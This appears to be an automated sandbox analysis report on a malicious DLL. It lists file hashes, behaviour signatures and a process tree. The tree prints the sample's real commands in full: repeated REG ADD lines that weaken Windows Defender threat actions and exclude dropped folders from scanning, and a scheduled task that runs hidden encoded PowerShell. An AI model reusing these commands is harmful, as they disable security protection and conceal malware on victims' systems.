Analysis
-
max time kernel
146s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 18:18
General
-
Target
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll
-
Size
304KB
-
MD5
f1e0baa123916ce237caee78536c75be
-
SHA1
3a24715b0a790836eb0323e0b2ee4663f8f759c2
-
SHA256
1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26
-
SHA512
721e0d3c53ba72cf9bb9470f5bad195c4d22503470ab0cf9a1019099bdc30a90451b01f2efc7e660eec0bd3114c20d44621e2ecb3148b6b5eda2c1dd14e2e849
Score
10/10
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 2 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies Internet Explorer settings 1 TTPs 16 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#12⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exe"C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exe" /S3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BsZkTgYBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BsZkTgYBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzYifeKYfmykC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzYifeKYfmykC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HJbvTEnmUxKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HJbvTEnmUxKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjkjItfMxIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjkjItfMxIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oJCzsrkBUUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oJCzsrkBUUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ehtkUBLERmscXYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ehtkUBLERmscXYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mXZOChzNWSbPIDPW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mXZOChzNWSbPIDPW\" /t REG_DWORD /d 0 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ehtkUBLERmscXYVB /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ehtkUBLERmscXYVB /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mXZOChzNWSbPIDPW /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mXZOChzNWSbPIDPW /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTKMCympe" /SC once /ST 06:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTKMCympe"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTKMCympe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:325⤵
-
